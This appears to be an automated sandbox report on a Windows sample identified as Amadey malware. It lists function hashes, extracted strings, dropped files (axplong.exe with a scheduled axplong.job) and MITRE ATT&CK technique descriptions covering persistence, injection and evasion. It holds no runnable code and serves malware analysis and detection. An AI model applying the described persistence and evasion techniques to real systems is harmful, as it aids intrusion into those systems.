Instruction ID: 7db539f9e787a460ed0402415c9febe84663a95d5ee0fa574f41061494ed0b56
Opcode Fuzzy Hash: 5292823e0901e2095568c644c3a13ac4312a4747ba2afa673666e88afcdacb82
Instruction Fuzzy Hash: AA11A723F30C255A675C816D8C172BAA1D2DBD824031F433AD826E7284E9A4DE23D290

Function 00B68720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 8d7e2eef643ca509f12d9c3ba68bfd704485747cbec9b9b9b3856f46b6d0c66d
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: D0113D7B20014147D6048A3DD9F45B7A7D6EBC5321B3C43FAD1514B768DE3AED45D900

Function 00B5645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55efca32861ff281b03bc5b6d7b4eba9befd90bd14aafac761c0a2a71d3a8aaf
Instruction ID: 14ba29f486b471cf4c8ca990d1cd1f510045fe2ea803ce4a8002d6a44066333c
Opcode Fuzzy Hash: 55efca32861ff281b03bc5b6d7b4eba9befd90bd14aafac761c0a2a71d3a8aaf
Instruction Fuzzy Hash: 88E08C31240A0C6FCF39BB15D96CE583B9AEB52342F504880FC145B221CB29ED85CE80

Function 00B5A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 9e814edfe4ebbefda4802616ed722d3ec0a2f4937a5f140d12d9ec8241110b3b
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 88E04632921628EBCB15DB888904E8AF6ECEB49B01F1541D6B901F3240C270DF04C7D0

Function 00B32E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

246122658369, xrefs: 00B333D4
WGt=, xrefs: 00B333BA
8KG0fymoFx==, xrefs: 00B32EC7
HBhr, xrefs: 00B3378F
invalid stoi argument, xrefs: 00B3425A
stoi argument out of range, xrefs: 00B34269
Fz==, xrefs: 00B3369E

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
API String ID: 0-2390467879
Opcode ID: 80153c308c24d54c38dd4c1e2f3ae9676f686021aa40857457b63cdbf2186d64
Instruction ID: ef5c6b611f33524e02ddb9fe1ef5489e822daa16023bb32e0342e972b5353974
Opcode Fuzzy Hash: 80153c308c24d54c38dd4c1e2f3ae9676f686021aa40857457b63cdbf2186d64
Instruction Fuzzy Hash: 9402C371900248DFEF24EFA8C845BDEBBF5EF05304F604198E805A7282D7759A84CFA1

Function 00B570C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00B5710B

Strings

.bat, xrefs: 00B5713A
.cmd, xrefs: 00B57129
.com, xrefs: 00B5714B
.exe, xrefs: 00B57118

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 61883f1949f7b409d328e3cb8362d1f1816550770dee32d185596a89b6ac8edc
Instruction ID: 336c09e3b4f8beb73eafd59adfb473ad31cffbc80c33e88aabdb871bedf7eb47
Opcode Fuzzy Hash: 61883f1949f7b409d328e3cb8362d1f1816550770dee32d185596a89b6ac8edc
Instruction Fuzzy Hash: 8A014977788A122626182418BC02B3B17D8DB86BB672900EBFD58F73C2EE44DC4641A0

Function 00B22E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00B22F1F
__Mtx_unlock.LIBCPMT ref: 00B22F8C
__Cnd_broadcast.LIBCPMT ref: 00B22FA3
__Mtx_unlock.LIBCPMT ref: 00B230B5
__Mtx_unlock.LIBCPMT ref: 00B2315B

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: e2a2810f964568796f0f9bbc5b396396734b3cbfdf693d0a0fb6e39e9b566c21
Instruction ID: 6ccabce8a0f51f20810de224eba9f709727be32ac5231b8a5dcfd153f4c29fec
Opcode Fuzzy Hash: e2a2810f964568796f0f9bbc5b396396734b3cbfdf693d0a0fb6e39e9b566c21
Instruction Fuzzy Hash: 51A11470900725AFDB11DFA4D945BAABBF8FF14710F1045A9E819E7281EB39EA04CBD1

Function 00B5C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B5CA37

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction ID: 45c0e378e467e5464e0ce72fc0fda2bc7af533e71429ebbac5ac34ad70e340f6
Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction Fuzzy Hash: 07B104329003899FDB11CF68C8817AEBFE6EF55341F1481EAED59AB341D6349D49CBA0

Function 00B3BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00B3BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 00B3BB14
_xtime_get.LIBCPMT ref: 00B3BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 00B3BB43

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 3d9f591a22327218f32c4e985880528eece52cbade225f46f6ccda53c1c86b09
Instruction ID: 5a7a7099f10c42937f6c9f2b3a882d92124a0da3809f0fe4075a9b87c2709029
Opcode Fuzzy Hash: 3d9f591a22327218f32c4e985880528eece52cbade225f46f6ccda53c1c86b09
Instruction Fuzzy Hash: CC212175E012199FDF10EFA4DC42DAEBBB8EF48714F2000A6F601B7251DB34AD418BA1

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

C:\Windows\Tasks\axplong.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
file.exe

Function 00B2BD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Function 00B25DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Function 00B27D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 00B56E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

